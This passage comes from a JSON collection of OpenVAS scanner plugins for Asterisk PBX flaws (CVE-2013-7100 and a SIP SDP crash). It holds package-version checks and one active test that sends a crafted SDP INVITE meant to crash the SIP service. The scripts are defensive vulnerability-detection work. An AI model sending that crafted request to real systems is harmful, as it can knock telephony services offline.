script_tag(name:\"vuldetect\", value:\"Send invalid SDP SIP request and check is it vulnerable to DoS or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Asterisk Open Source to 1.8.23.1, 10.12.3, 11.5.1 or later,\n Certified Asterisk to 1.8.15-cert3, 11.2-cert2 or later,\n Asterisk Digiumphones 10.12.3-digiumphones or 
later.\");\n\n script_tag(name:\"insight\", value:\"Error within the SIP channel driver when handling a crafted SDP in a SIP\n request.\");\n\n script_tag(name:\"affected\", value:\"Asterisk Open Source 1.8.x to 1.8.23.0, 10.x to 10.12.2 and 11.x to 11.5.0\n Certified Asterisk 1.8.15 to 1.8.15-cert2 and 11.2 to 11.2-cert1\n Asterisk Digiumphones 10.x-digiumphones to 10.12.2-digiumphones\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to cause a denial of\n service via a crafted SDP in a SIP request.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_xref(name:\"URL\", value:\"http://www.asterisk.org\");\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_location_and_proto( cpe:CPE, port:port ) )\n exit( 0 );\n\nproto = infos[\"proto\"];\nif( ! 
sip_alive( port:port, proto:proto ) )\n exit( 0 );\n\nhost_name = get_host_name();\nthis_host = this_host();\n\nvtstrings = get_vt_strings();\nuseragent = vtstrings[\"default\"];\n\ncon_data = string(\"v=0\", \"\\r\\n\",\n \"o=user1 53655765 2353687637 IN IP4\", this_host,\"\\r\\n\",\n \"s=-\", \"\\r\\n\",\n \"t=0 0\", \"\\r\\n\",\n \"m=audio 6000 RTP/AVP 8 0\", \"\\r\\n\",\n \"m=video 6002 RTP/AVP 31\", \"\\r\\n\",\n \"c=IN IP4\", this_host);\n\ncraf_req = string( \"INVITE sip:test@\", host_name, \":\", port, \" SIP/2.0\", \"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", this_host, \":\", port,\";branch=z9hG4bK-25912-1-0\",\"\\r\\n\",\n \"From: test1 <sip:guest0@\", this_host, \":\", port, \";tag=1\", \"\\r\\n\",\n \"To: test <sip:test@\", host_name, \":\", port, \">\", \"\\r\\n\",\n \"Call-ID: 1-25912@\", this_host, \"\\r\\n\",\n \"CSeq: 1 INVITE\", \"\\r\\n\",\n \"Contact: sip:guest@\", this_host, \":\", port, \"\\r\\n\",\n \"Max-Forwards: 70\", \"\\r\\n\",\n \"Subject: DoS Test\", \"\\r\\n\",\n \"User-Agent: \", useragent, \" DoS Test\", \"\\r\\n\",\n \"Content-Type: application/sdp\", \"\\r\\n\",\n \"Content-Length: \", strlen(con_data), \"\\r\\n\\r\\n\",\n con_data, \"\\r\\n\");\n\nsip_send_recv( port:port, data:craf_req, proto:proto );\nsleep( 2 );\n\nif( ! 
sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:48:37", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24142", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867223", "href": "http://plugins.openvas.org/nasl.php?oid=867223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24142\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867223);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:45:29 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24142\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. 
Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-24142\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125875.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:13", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24119", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867224", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24119\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867224\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:46:35 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24119\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-24119\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125891.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:48:26", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24119", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867224", "href": "http://plugins.openvas.org/nasl.php?oid=867224", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24119\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867224);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:46:35 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24119\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. 
Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-24119\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125891.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24142", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867223", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24142\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867223\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:45:29 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24142\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-24142\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125875.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24108", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867306", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867306", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24108\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in 
the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867306\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 18:42:42 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24108\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-24108\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125903.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:31", "description": "Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described in AST-2013-007.html.\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system administrator to disable the expansion of\ndangerous\nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no", "cvss3": {}, "published": "2014-01-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702835", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2835.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2835-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# 
of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702835\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2013-7100\");\n script_name(\"Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-05 00:00:00 +0100 (Sun, 05 Jan 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2835.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nFor the unstable distribution (sid), this problem has been 
fixed in\nversion 1:11.7.0~dfsg-1.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described AST-2013-007.html.\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous\nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk\", 
ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:48:24", "description": "Check for the 
Version of asterisk", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24108", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867306", "href": "http://plugins.openvas.org/nasl.php?oid=867306", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24108\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867306);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 18:42:42 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24108\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. 
